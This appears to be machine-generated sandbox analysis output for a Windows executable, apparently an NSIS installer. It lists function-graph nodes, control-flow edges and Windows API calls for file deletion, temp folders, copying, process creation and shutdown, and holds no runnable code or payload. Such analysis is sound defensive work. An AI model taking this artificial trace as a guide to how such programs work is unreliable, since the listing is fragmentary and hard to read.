GetDlgItem 3295->3296 3297 403db6 ShowWindow KiUserCallbackDispatcher 3296->3297 3298 403dae 3296->3298 3320 404008 KiUserCallbackDispatcher 3297->3320 3298->3297 3300 403de0 EnableWindow 3303 403df4 3300->3303 3301 403df9 GetSystemMenu EnableMenuItem SendMessageW 3302 403e29 SendMessageW 3301->3302 3301->3303 3302->3303 3303->3301 3321 40401b SendMessageW 3303->3321 3322 405da1 lstrcpynW 3303->3322 3306 403e57 lstrlenW 3307 405dc3 18 API calls 3306->3307 3308 403e6d SetWindowTextW 3307->3308 3309 401389 2 API calls 3308->3309 3309->3280 3311 403ecb CreateDialogParamW 3310->3311 3310->3319 3312 403efe 3311->3312 3311->3319 3313 403fe6 19 API calls 3312->3313 3314 403f09 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3313->3314 3315 401389 2 API calls 3314->3315 3316 403f4f 3315->3316 3316->3282 3317 403f57 ShowWindow 3316->3317 3318 404032 SendMessageW 3317->3318 3318->3319 3319->3279 3319->3282 3320->3300 3321->3303 3322->3306 3956 401491 3957 40504b 25 API calls 3956->3957 3958 401498 3957->3958 3959 402293 3960 402b38 18 API calls 3959->3960 3961 4022a2 3960->3961 3962 402b38 18 API calls 3961->3962 3963 4022ab 3962->3963 3964 402b38 18 API calls 3963->3964 3965 4022b5 GetPrivateProfileStringW 3964->3965 3445 401f98 3446 401faa 3445->3446 3456 40205c 3445->3456 3447 402b38 18 API calls 3446->3447 3449 401fb1 3447->3449 3448 401423 25 API calls 3451 402195 3448->3451 3450 402b38 18 API calls 3449->3450 3452 401fba 3450->3452 3453 401fd0 LoadLibraryExW 3452->3453 3454 401fc2 GetModuleHandleW 3452->3454 3455 401fe1 3453->3455 3453->3456 3454->3453 3454->3455 3465 406177 WideCharToMultiByte 3455->3465 3456->3448 3459 401ff2 3462 401423 25 API calls 3459->3462 3463 402002 3459->3463 3460 40202b 3461 40504b 25 API calls 3460->3461 3461->3463 3462->3463 3463->3451 3464 40204e FreeLibrary 3463->3464 3464->3451 3466 4061a1 GetProcAddress 3465->3466 3467 401fec 3465->3467 3466->3467 3467->3459 3467->3460 3966 401718 3967 402b38 18 API calls 3966->3967 3968 40171f SearchPathW 3967->3968 3969 40173a 3968->3969 3970 40159b 3971 402b38 18 API calls 3970->3971 3972 4015a2 SetFileAttributesW 3971->3972 3973 4015b4 3972->3973 3974 40149e 3975 4014ac PostQuitMessage 3974->3975 3976 40223c 3974->3976 3975->3976 3977 40219e 3978 402b38 18 API calls 3977->3978 3979 4021a4 3978->3979 3980 402b38 18 API calls 3979->3980 3981 4021ad 3980->3981 3982 402b38 18 API calls 3981->3982 3983 4021b6 3982->3983 3984 4060e4 2 API calls 3983->3984 3985 4021bf 3984->3985 3986 4021d0 lstrlenW lstrlenW 3985->3986 3990 4021c3 3985->3990 3988 40504b 25 API calls 3986->3988 3987 40504b 25 API calls 3991 4021cb 3987->3991 3989 40220e SHFileOperationW 3988->3989 3989->3990 3989->3991 3990->3987 3990->3991 3992 4029a0 SendMessageW 3993 4029c5 3992->3993 3994 4029ba InvalidateRect 3992->3994 3994->3993 3995 401b22 3996 401b73 3995->3996 3997 401b2f 3995->3997 3999 401b78 3996->3999 4000 401b9d GlobalAlloc 3996->4000 3998 402229 3997->3998 4004 401b46 3997->4004 4002 405dc3 18 API calls 3998->4002 4006 401bb8 3999->4006 4016 405da1 lstrcpynW 3999->4016 4001 405dc3 18 API calls 4000->4001 4001->4006 4007 402236 4002->4007 4014 405da1 lstrcpynW 4004->4014 4005 401b8a GlobalFree 4005->4006 4009 40557d MessageBoxIndirectW 4007->4009 4009->4006 4010 401b55 4015 405da1 lstrcpynW 4010->4015 4012 401b64 4017 405da1 lstrcpynW 4012->4017 4014->4010 4015->4012 4016->4005 4017->4006 4018 402222 4019 402229 4018->4019 4021 40223c 4018->4021 4020 405dc3 18 API calls 4019->4020 4022 402236 4020->4022 4023 40557d MessageBoxIndirectW 4022->4023 4023->4021 2712 401924 2713 401926 2712->2713 2718 402b38 2713->2718 2719 402b44 2718->2719 2764 405dc3 2719->2764 2722 40192b 2724 405629 2722->2724 2803 4058f4 2724->2803 2727 405651 DeleteFileW 2729 401934 2727->2729 2728 405668 2731 405793 2728->2731 2817 405da1 lstrcpynW 2728->2817 2731->2729 2847 4060e4 FindFirstFileW 2731->2847 2732 40568e 2733 4056a1 2732->2733 2734 405694 lstrcatW 2732->2734 2818 405838 lstrlenW 2733->2818 2735 4056a7 2734->2735 2738 4056b7 lstrcatW 2735->2738 2739 4056ad 2735->2739 2741 4056c2 lstrlenW FindFirstFileW 2738->2741 2739->2738 2739->2741 2743 405788 2741->2743 2762 4056e4 2741->2762 2742 4057b1 2850 4057ec lstrlenW CharPrevW 2742->2850 2743->2731 2746 40576b FindNextFileW 2749 405781 FindClose 2746->2749 2746->2762 2747 4055e1 5 API calls 2750 4057c3 2747->2750 2749->2743 2751 4057c7 2750->2751 2752 4057dd 2750->2752 2751->2729 2755 40504b 25 API calls 2751->2755 2754 40504b 25 API calls 2752->2754 2754->2729 2757 4057d4 2755->2757 2756 405629 64 API calls 2756->2762 2758 405c3b 40 API calls 2757->2758 2760 4057db 2758->2760 2759 40504b 25 API calls 2759->2746 2760->2729 2762->2746 2762->2756 2762->2759 2822 405da1 lstrcpynW 2762->2822 2823 4055e1 2762->2823 2831 40504b 2762->2831 2842 405c3b 2762->2842 2765 405dd0 2764->2765 2766 40601b 2765->2766 2769 405e83 GetVersion 2765->2769 2770 405fe9 lstrlenW 2765->2770 2772 405dc3 10 API calls 2765->2772 2775 405efe GetSystemDirectoryW 2765->2775 2776 405f11 GetWindowsDirectoryW 2765->2776 2777 406035 5 API calls 2765->2777 2778 405dc3 10 API calls 2765->2778 2779 405f8a lstrcatW 2765->2779 2780 405f45 SHGetSpecialFolderLocation 2765->2780 2791 405c6e RegOpenKeyExW 2765->2791 2796 405ce8 wsprintfW 2765->2796 2797 405da1 lstrcpynW 2765->2797 2767 402b65 2766->2767 2798 405da1 lstrcpynW 2766->2798 2767->2722 2782 406035 2767->2782 2769->2765 2770->2765 2772->2770 2775->2765 2776->2765 2777->2765 2778->2765 2779->2765 2780->2765 2781 405f5d SHGetPathFromIDListW CoTaskMemFree 2780->2781 2781->2765 2789 406042 2782->2789 2783 4060b8 2784 4060bd CharPrevW 2783->2784 2786 4060de 2783->2786 2784->2783 2785 4060ab CharNextW 2785->2783 2785->2789 2786->2722 2788 406097 CharNextW 2788->2789 2789->2783 2789->2785 2789->2788 2790 4060a6 CharNextW 2789->2790 2799 405819 2789->2799 2790->2785 2792 405ce2 2791->2792 2793 405ca2 RegQueryValueExW 2791->2793 2792->2765 2794 405cc3 RegCloseKey 2793->2794 2794->2792 2796->2765 2797->2765 2798->2767 2800 40581f 2799->2800 2801 405835 2800->2801 2802 405826 CharNextW 2800->2802 2801->2789 2802->2800 2853 405da1 lstrcpynW 2803->2853 2805 405905 2854 405897 CharNextW CharNextW 2805->2854 2808 405649 2808->2727 2808->2728 2809 406035 5 API calls 2815 40591b 2809->2815 2810 40594c lstrlenW 2811 405957 2810->2811 2810->2815 2813 4057ec 3 API calls 2811->2813 2812 4060e4 2 API calls 2812->2815 2814 40595c GetFileAttributesW 2813->2814 2814->2808 2815->2808 2815->2810 2815->2812 2816 405838 2 API calls 2815->2816 2816->2810 2817->2732 2819 405846 2818->2819 2820 405858 2819->2820 2821 40584c CharPrevW 2819->2821 2820->2735 2821->2819 2821->2820 2822->2762 2860 4059e8 GetFileAttributesW 2823->2860 2826 405604 DeleteFileW 2829 40560a 2826->2829 2827 4055fc RemoveDirectoryW 2827->2829 2828 40560e 2828->2762 2829->2828 2830 40561a SetFileAttributesW 2829->2830 2830->2828 2832 405066 2831->2832 2841 405108 2831->2841 2833 405082 lstrlenW 2832->2833 2834 405dc3 18 API calls 2832->2834 2835 405090 lstrlenW 2833->2835 2836 4050ab 2833->2836 2834->2833 2839 4050a2 lstrcatW 2835->2839 2835->2841 2837 4050b1 SetWindowTextW 2836->2837 2838 4050be 2836->2838 2837->2838 2840 4050c4 SendMessageW SendMessageW SendMessageW 2838->2840 2838->2841 2839->2836 2840->2841 2841->2762 2863 40610b GetModuleHandleA 2842->2863 2846 405c63 2846->2762 2848 4057ad 2847->2848 2849 4060fa FindClose 2847->2849 2848->2729 2848->2742 2849->2848 2851 4057b7 2850->2851 2852 405808 lstrcatW 2850->2852 2851->2747 2852->2851 2853->2805 2855 4058b4 2854->2855 2856 4058c6 2854->2856 2855->2856 2857 4058c1 CharNextW 2855->2857 2858 405819 CharNextW 2856->2858 2859 4058ea 2856->2859 2857->2859 2858->2856 2859->2808 2859->2809 2861 4055ed 2860->2861 2862 4059fa SetFileAttributesW 2860->2862 2861->2826 2861->2827 2861->2828 2862->2861 2864 406132 GetProcAddress 2863->2864 2865 406127 LoadLibraryA 2863->2865 2866 405c42 2864->2866 2865->2864 2865->2866 2866->2846 2867 405abf lstrcpyW 2866->2867 2868 405ae8 2867->2868 2869 405b0e GetShortPathNameW 2867->2869 2892 405a0d GetFileAttributesW CreateFileW 2868->2892 2871 405b23 2869->2871 2872 405c35 2869->2872 2871->2872 2874 405b2b wsprintfA 2871->2874 2872->2846 2873 405af2 CloseHandle GetShortPathNameW 2873->2872 2876 405b06 2873->2876 2875 405dc3 18 API calls 2874->2875 2877 405b53 2875->2877 2876->2869 2876->2872 2893 405a0d GetFileAttributesW CreateFileW 2877->2893 2879 405b60 2879->2872 2880 405b6f GetFileSize GlobalAlloc 2879->2880 2881 405b91 2880->2881 2882 405c2e CloseHandle 2880->2882 2894 405a90 ReadFile 2881->2894 2882->2872 2887 405bb0 lstrcpyA 2889 405bd2 2887->2889 2888 405bc4 2890 405972 4 API calls 2888->2890 2891 405c09 SetFilePointer WriteFile GlobalFree 2889->2891 2890->2889 2891->2882 2892->2873 2893->2879 2895 405aae 2894->2895 2895->2882 2896 405972 lstrlenA 2895->2896 2897 4059b3 lstrlenA 2896->2897 2898 4059bb 2897->2898 2899 40598c lstrcmpiA 2897->2899 2898->2887 2898->2888 2899->2898 2900 4059aa CharNextA 2899->2900 2900->2897 4024 402727 4025 40272e 4024->4025 4027 4029c5 4024->4027 4026 402734 FindClose 4025->4026 4026->4027 2915 403229 #17 SetErrorMode OleInitialize 2916 40610b 3 API calls 2915->2916 2917 40326c SHGetFileInfoW 2916->2917 2988 405da1 lstrcpynW 2917->2988 2919 403297 GetCommandLineW 2989 405da1 lstrcpynW 2919->2989 2921 4032a9 GetModuleHandleW 2922 4032c1 2921->2922 2923 405819 CharNextW 2922->2923 2924 4032d0 CharNextW 2923->2924 2934 4032e0 2924->2934 2925 4033b5 2926 4033c9 GetTempPathW 2925->2926 2990 4031f5 2926->2990 2928 4033e1 2929 4033e5 GetWindowsDirectoryW lstrcatW 2928->2929 2930 40343b DeleteFileW 2928->2930 2932 4031f5 11 API calls 2929->2932 2998 402d67 GetTickCount GetModuleFileNameW 2930->2998 2931 405819 CharNextW 2931->2934 2935 403401 2932->2935 2934->2925 2934->2931 2939 4033b7 2934->2939 2935->2930 2938 403405 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2935->2938 2936 40344f 2937 4034e7 2936->2937 2940 4034d7 2936->2940 2944 405819 CharNextW 2936->2944 3083 403691 2937->3083 2943 4031f5 11 API calls 2938->2943 3080 405da1 lstrcpynW 2939->3080 3026 40376b 2940->3026 2947 403433 2943->2947 2948 40346a 2944->2948 2947->2930 2947->2937 2955 4034b1 2948->2955 2956 403516 lstrcatW lstrcmpiW 2948->2956 2949 403500 3090 40557d 2949->3090 2950 4035f6 2951 403679 ExitProcess 2950->2951 2953 40610b 3 API calls 2950->2953 2958 403605 2953->2958 2959 4058f4 18 API calls 2955->2959 2956->2937 2960 403532 CreateDirectoryW SetCurrentDirectoryW 2956->2960 2961 40610b 3 API calls 2958->2961 2962 4034bd 2959->2962 2963 403555 2960->2963 2964 40354a 2960->2964 2965 40360e 2961->2965 2962->2937 3081 405da1 lstrcpynW 2962->3081 3095 405da1 lstrcpynW 2963->3095 3094 405da1 lstrcpynW 2964->3094 2968 40610b 3 API calls 2965->2968 2970 403617 2968->2970 2973 403665 ExitWindowsEx 2970->2973 2979 403625 GetCurrentProcess 2970->2979 2971 4034cc 3082 405da1 lstrcpynW 2971->3082 2972 405dc3 18 API calls 2975 403594 DeleteFileW 2972->2975 2973->2951 2976 403672 2973->2976 2977 4035a1 CopyFileW 2975->2977 2985 403563 2975->2985 3099 40140b 2976->3099 2977->2985 2982 403635 2979->2982 2980 4035ea 2983 405c3b 40 API calls 2980->2983 2981 405c3b 40 API calls 2981->2985 2982->2973 2983->2937 2984 405dc3 18 API calls 2984->2985 2985->2972 2985->2980 2985->2981 2985->2984 2987 4035d5 CloseHandle 2985->2987 3096 40551c CreateProcessW 2985->3096 2987->2985 2988->2919 2989->2921 2991 406035 5 API calls 2990->2991 2993 403201 2991->2993 2992 40320b 2992->2928 2993->2992 2994 4057ec 3 API calls 2993->2994 2995 403213 CreateDirectoryW 2994->2995 3102 405a3c 2995->3102 3106 405a0d GetFileAttributesW CreateFileW 2998->3106 3000 402da7 3019 402db7 3000->3019 3107 405da1 lstrcpynW 3000->3107 3002 402dcd 3003 405838 2 API calls 3002->3003 3004 402dd3 3003->3004 3108 405da1 lstrcpynW 3004->3108 3006 402dde GetFileSize 3007 402eda 3006->3007 3025 402df5 3006->3025 3109 402d03 3007->3109 3009 402ee3 3011 402f13 GlobalAlloc 3009->3011 3009->3019 3145 4031de SetFilePointer 3009->3145 3120 4031de SetFilePointer 3011->3120 3014 402f46 3016 402d03 6 API calls 3014->3016 3015 402f2e 3121 402fa0 3015->3121 3016->3019 3017 402efc 3020 4031c8 ReadFile 3017->3020 3019->2936 3021 402f07 3020->3021 3021->3011 3021->3019 3022 402d03 6 API calls 3022->3025 3023 402f3a 3023->3019 3023->3023 3024 402f77 SetFilePointer 3023->3024 3024->3019 3025->3007 3025->3014 3025->3019 3025->3022 3142 4031c8 3025->3142 3027 40610b 3 API calls 3026->3027 3028 40377f 3027->3028 3029 403785 3028->3029 3030 403797 3028->3030 3167 405ce8 wsprintfW 3029->3167 3031 405c6e 3 API calls 3030->3031 3032 4037c7 3031->3032 3034 4037e6 lstrcatW 3032->3034 3036 405c6e 3 API calls 3032->3036 3035 403795 3034->3035 3151 403a41 3035->3151 3036->3034 3039 4058f4 18 API calls 3041 403818 3039->3041 3040 4038ac 3042 4058f4 18 API calls 3040->3042 3041->3040 3043 405c6e 3 API calls 3041->3043 3044 4038b2 3042->3044 3045 40384a 3043->3045 3046 4038c2 LoadImageW 3044->3046 3047 405dc3 18 API calls 3044->3047 3045->3040 3050 40386b lstrlenW 3045->3050 3053 405819 CharNextW 3045->3053 3048 403968 3046->3048 3049 4038e9 RegisterClassW 3046->3049 3047->3046 3052 40140b 2 API calls 3048->3052 3051 40391f SystemParametersInfoW CreateWindowExW 3049->3051 3079 403972 3049->3079 3054 403879 lstrcmpiW 3050->3054 3055 40389f 3050->3055 3051->3048 3056 40396e 3052->3056 3058 403868 3053->3058 3054->3055 3059 403889 GetFileAttributesW 3054->3059 3057 4057ec 3 API calls 3055->3057 3060 403a41 19 API calls 3056->3060 3056->3079 3061 4038a5 3057->3061 3058->3050 3062 403895 3059->3062 3063 40397f 3060->3063 3168 405da1 lstrcpynW 3061->3168 3062->3055 3065 405838 2 API calls 3062->3065 3066 40398b ShowWindow LoadLibraryW 3063->3066 3067 403a0e 3063->3067 3065->3055 3068 4039b1 GetClassInfoW 3066->3068 3069 4039aa LoadLibraryW 3066->3069 3160 40511e OleInitialize 3067->3160 3071 4039c5 GetClassInfoW RegisterClassW 3068->3071 3072 4039db DialogBoxParamW 3068->3072 3069->3068 3071->3072 3074 40140b 2 API calls 3072->3074 3073 403a14 3075 403a30 3073->3075 3076 403a18 3073->3076 3074->3079 3077 40140b 2 API calls 3075->3077 3078 40140b 2 API calls 3076->3078 3076->3079 3077->3079 3078->3079 3079->2937 3080->2926 3081->2971 3082->2940 3084 4036a9 3083->3084 3085 40369b CloseHandle 3083->3085 3177 4036d6 3084->3177 3085->3084 3088 405629 71 API calls 3089 4034f0 OleUninitialize 3088->3089 3089->2949 3089->2950 3091 405592 3090->3091 3092 40350e ExitProcess 3091->3092 3093 4055a6 MessageBoxIndirectW 3091->3093 3093->3092 3094->2963 3095->2985 3097 405557 3096->3097 3098 40554b CloseHandle 3096->3098 3097->2985 3098->3097 3100 401389 2 API calls 3099->3100 3101 401420 3100->3101 3101->2951 3103 405a49 GetTickCount GetTempFileNameW 3102->3103 3104 403227 3103->3104 3105 405a7f 3103->3105 3104->2928 3105->3103 3105->3104 3106->3000 3107->3002 3108->3006 3110 402d24 3109->3110 3111 402d0c 3109->3111 3112 402d34 GetTickCount 3110->3112 3113 402d2c 3110->3113 3114 402d15 DestroyWindow 3111->3114 3115 402d1c 3111->3115 3117 402d42 CreateDialogParamW ShowWindow 3112->3117 3118 402d65 3112->3118 3146 406144 3113->3146 3114->3115 3115->3009 3117->3118 3118->3009 3120->3015 3122 402fbb 3121->3122 3123 402fe8 3122->3123 3150 4031de SetFilePointer 3122->3150 3124 4031c8 ReadFile 3123->3124 3126 402ff3 3124->3126 3127 403149 3126->3127 3128 403005 GetTickCount 3126->3128 3129 40315e 3126->3129 3127->3023 3128->3127 3138 403052 3128->3138 3130 403162 3129->3130 3131 40317a 3129->3131 3132 4031c8 ReadFile 3130->3132 3131->3127 3134 4031c8 ReadFile 3131->3134 3135 403195 WriteFile 3131->3135 3132->3127 3133 4031c8 ReadFile 3133->3138 3134->3131 3135->3127 3136 4031a9 3135->3136 3136->3127 3136->3131 3137 4030a8 GetTickCount 3137->3138 3138->3127 3138->3133 3138->3137 3139 4030cd MulDiv wsprintfW 3138->3139 3141 403111 WriteFile 3138->3141 3140 40504b 25 API calls 3139->3140 3140->3138 3141->3127 3141->3138 3143 405a90 ReadFile 3142->3143 3144 4031db 3143->3144 3144->3025 3145->3017 3147 406161 PeekMessageW 3146->3147 3148 402d32 3147->3148 3149 406157 DispatchMessageW 3147->3149 3148->3009 3149->3147 3150->3123 3152 403a55 3151->3152 3169 405ce8 wsprintfW 3152->3169 3154 403ac6 3155 405dc3 18 API calls 3154->3155 3156 403ad2 SetWindowTextW 3155->3156 3157 4037f6 3156->3157 3158 403aee 3156->3158 3157->3039 3158->3157 3159 405dc3 18 API calls 3158->3159 3159->3158 3170 404032 3160->3170 3162 405168 3163 404032 SendMessageW 3162->3163 3164 40517a OleUninitialize 3163->3164 3164->3073 3165 405141 3165->3162 3173 401389 3165->3173 3167->3035 3168->3040 3169->3154 3171 40404a 3170->3171 3172 40403b SendMessageW 3170->3172 3171->3165 3172->3171 3175 401390 3173->3175 3174 4013fe 3174->3165 3175->3174 3176 4013cb MulDiv SendMessageW 3175->3176 3176->3175 3178 4036e4 3177->3178 3179 4036ae 3178->3179 3180 4036e9 FreeLibrary GlobalFree 3178->3180 3179->3088 3180->3179 3180->3180 4028 403729 4029 403734 4028->4029 4030 403738 4029->4030 4031 40373b GlobalAlloc 4029->4031 4031->4030 4032 401cab 4033 402b1b 18 API calls 4032->4033 4034 401cb2 4033->4034 4035 402b1b 18 API calls 4034->4035 4036 401cba GetDlgItem 4035->4036 4037 4024e6 4036->4037 3323 40232f 3324 402335 3323->3324 3325 402b38 18 API calls 3324->3325 3326 402347 3325->3326 3327 402b38 18 API calls 3326->3327 3328 402351 RegCreateKeyExW 3327->3328 3329 40237b 3328->3329 3330 402791 3328->3330 3331 402b38 18 API calls 3329->3331 3333 402396 3329->3333 3336 40238c lstrlenW 3331->3336 3332 4023a2 3335 4023bd RegSetValueExW 3332->3335 3337 402fa0 33 API calls 3332->3337 3333->3332 3340 402b1b 3333->3340 3338 4023d3 RegCloseKey 3335->3338 3336->3333 3337->3335 3338->3330 3341 405dc3 18 API calls 3340->3341 3342 402b2f 3341->3342 3342->3332 4038 4016af 4039 402b38 18 API calls 4038->4039 4040 4016b5 GetFullPathNameW 4039->4040 4041 4016f1 4040->4041 4042 4016cf 4040->4042 4043 4029c5 4041->4043 4044 401706 GetShortPathNameW 4041->4044 4042->4041 4045 4060e4 2 API calls 4042->4045 4044->4043 4046 4016e1 4045->4046 4046->4041 4048 405da1 lstrcpynW 4046->4048 4048->4041 4049 4027b3 4050 402b38 18 API calls 4049->4050 4051 4027c1 4050->4051 4052 4027d7 4051->4052 4053 402b38 18 API calls 4051->4053 4054 4059e8 2 API calls 4052->4054 4053->4052 4055 4027dd 4054->4055 4075 405a0d GetFileAttributesW CreateFileW 4055->4075 4057 4027ea 4058 402893 4057->4058 4059 4027f6 GlobalAlloc 4057->4059 4062 40289b DeleteFileW 4058->4062 4063 4028ae 4058->4063 4060 40288a CloseHandle 4059->4060 4061 40280f 4059->4061 4060->4058 4076 4031de SetFilePointer 4061->4076 4062->4063 4065 402815 4066 4031c8 ReadFile 4065->4066 4067 40281e GlobalAlloc 4066->4067 4068 402862 WriteFile GlobalFree 4067->4068 4069 40282e 4067->4069 4070 402fa0 33 API calls 4068->4070 4071 402fa0 33 API calls 4069->4071 4072 402887 4070->4072 4074 40283b 4071->4074 4072->4060 4073 402859 GlobalFree 4073->4068 4074->4073 4075->4057 4076->4065 4077 404134 lstrlenW 4078 404153 4077->4078 4079 404155 WideCharToMultiByte 4077->4079 4078->4079 4080 4028b4 4081 402b1b 18 API calls 4080->4081 4082 4028ba 4081->4082 4083 4028f6 4082->4083 4084 4028dd 4082->4084 4088 402791 4082->4088 4086 402900 4083->4086 4087 40290c 4083->4087 4085 4028e2 4084->4085 4093 4028f3 4084->4093 4094 405da1 lstrcpynW 4085->4094 4089 402b1b 18 API calls 4086->4089 4090 405dc3 18 API calls 4087->4090 4089->4093 4090->4093 4093->4088 4095 405ce8 wsprintfW 4093->4095 4094->4088 4095->4088 4096 4014b8 4097 4014be 4096->4097 4098 401389 2 API calls 4097->4098 4099 4014c6 4098->4099 3468 4015b9 3469 402b38 18 API calls 3468->3469 3470 4015c0 3469->3470 3471 405897 4 API calls 3470->3471 3480 4015c9 3471->3480 3472 401614 3473 401619 3472->3473 3476 401646 3472->3476 3475 401423 25 API calls 3473->3475 3474 405819 CharNextW 3477 4015d7 CreateDirectoryW 3474->3477 3479 401620 3475->3479 3478 401423 25 API calls 3476->3478 3477->3480 3481 4015ed GetLastError 3477->3481 3485 40163e 3478->3485 3486 405da1 lstrcpynW 3479->3486 3480->3472 3480->3474 3481->3480 3483 4015fa GetFileAttributesW 3481->3483 3483->3480 3484 40162d SetCurrentDirectoryW 3484->3485 3486->3484 4100 401939 4101 402b38 18 API calls 4100->4101 4102 401940 lstrlenW 4101->4102 4103 4024e6 4102->4103 4104 402939 4105 402b1b 18 API calls 4104->4105 4106 40293f 4105->4106 4107 402972 4106->4107 4109 402791 4106->4109 4110 40294d 4106->4110 4108 405dc3 18 API calls 4107->4108 4107->4109 4108->4109 4110->4109 4112 405ce8 wsprintfW 4110->4112 4112->4109 4113 40443a 4114 404470 4113->4114 4115 40444a 4113->4115 4117 40404d 8 API calls 4114->4117 4116 403fe6 19 API calls 4115->4116 4118 404457 SetDlgItemTextW 4116->4118 4119 40447c 4117->4119 4118->4114 3487 40173f 3488 402b38 18 API calls 3487->3488 3489 401746 3488->3489 3490 405a3c 2 API calls 3489->3490 3491 40174d 3490->3491 3492 405a3c 2 API calls 3491->3492 3492->3491 4120 404fbf 4121 404fe3 4120->4121 4122 404fcf 4120->4122 4123 404feb IsWindowVisible 4121->4123 4131 405002 4121->4131 4124 404fd5 4122->4124 4125 40502c 4122->4125 4123->4125 4127 404ff8 4123->4127 4126 404032 SendMessageW 4124->4126 4128 405031 CallWindowProcW 4125->4128 4129 404fdf 4126->4129 4130 404915 5 API calls 4127->4130 4128->4129 4130->4131 4131->4128 4132 404995 4 API calls 4131->4132 4132->4125

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403229-4032bf #17 SetErrorMode OleInitialize call 40610b SHGetFileInfoW call 405da1 GetCommandLineW call 405da1 GetModuleHandleW 7 4032c1-4032c8 0->7 8 4032c9-4032db call 405819 CharNextW 0->8 7->8 11 4033a9-4033af 8->11 12 4032e0-4032e6 11->12 13 4033b5 11->13 15 4032e8-4032ed 12->15 16 4032ef-4032f5 12->16 14 4033c9-4033e3 GetTempPathW call 4031f5 13->14 25 4033e5-403403 GetWindowsDirectoryW lstrcatW call 4031f5 14->25 26 40343b-403455 DeleteFileW call 402d67 14->26 15->15 15->16 18 4032f7-4032fb 16->18 19 4032fc-403300 16->19 18->19 20 403306-40330c 19->20 21 40339a-4033a5 call 405819 19->21 23 403326-40333d 20->23 24 40330e-403315 20->24 21->11 39 4033a7-4033a8 21->39 30 40336b-403381 23->30 31 40333f-403355 23->31 28 403317-40331a 24->28 29 40331c 24->29 25->26 44 403405-403435 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031f5 25->44 40 4034eb-4034fa call 403691 OleUninitialize 26->40 41 40345b-403461 26->41 28->23 28->29 29->23 30->21 37 403383-403398 30->37 31->30 35 403357-40335f 31->35 42 403361-403364 35->42 43 403366 35->43 37->21 45 4033b7-4033c4 call 405da1 37->45 39->11 57 403500-403510 call 40557d ExitProcess 40->57 58 4035f6-4035fc 40->58 46 403463-40346e call 405819 41->46 47 4034db-4034e2 call 40376b 41->47 42->30 42->43 43->30 44->26 44->40 45->14 61 403470-403481 46->61 62 4034a5-4034af 46->62 56 4034e7 47->56 56->40 59 403679-403681 58->59 60 4035fe-40361b call 40610b * 3 58->60 66 403683 59->66 67 403687-40368b ExitProcess 59->67 91 403665-403670 ExitWindowsEx 60->91 92 40361d-40361f 60->92 65 403483-403485 61->65 68 4034b1-4034bf call 4058f4 62->68 69 403516-403530 lstrcatW lstrcmpiW 62->69 72 403487-40349d 65->72 73 40349f-4034a3 65->73 66->67 68->40 81 4034c1-4034d7 call 405da1 * 2 68->81 69->40 75 403532-403548 CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->73 73->62 73->65 78 403555-40357e call 405da1 75->78 79 40354a-403550 call 405da1 75->79 87 403583-40359f call 405dc3 DeleteFileW 78->87 79->78 81->47 98 4035e0-4035e8 87->98 99 4035a1-4035b1 CopyFileW 87->99 91->59 96 403672-403674 call 40140b 91->96 92->91 97 403621-403623 92->97 96->59 97->91 101 403625-403637 GetCurrentProcess 97->101 98->87 103 4035ea-4035f1 call 405c3b 98->103 99->98 102 4035b3-4035d3 call 405c3b call 405dc3 call 40551c 99->102 101->91 109 403639-40365b 101->109 102->98 115 4035d5-4035dc CloseHandle 102->115 103->40 109->91 115->98
                                                                  APIs
                                                                  • #17.COMCTL32 ref: 00403248
                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403253
                                                                  • OleInitialize.OLE32(00000000), ref: 0040325A
                                                                    • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                    • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                    • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403282
                                                                    • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,00433EA0,NSIS Error), ref: 00405DAE
                                                                  • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 00403297
                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000), ref: 004032AA
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000020), ref: 004032D1
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033DA
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033EB
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F7
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040340B
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403413
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403424
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040342C
                                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403440
                                                                  • OleUninitialize.OLE32(?), ref: 004034F0
                                                                  • ExitProcess.KERNEL32 ref: 00403510
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000,?), ref: 0040351C
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\yMXFgPOdf2.exe",00000000,?), ref: 00403528
                                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403534
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040353B
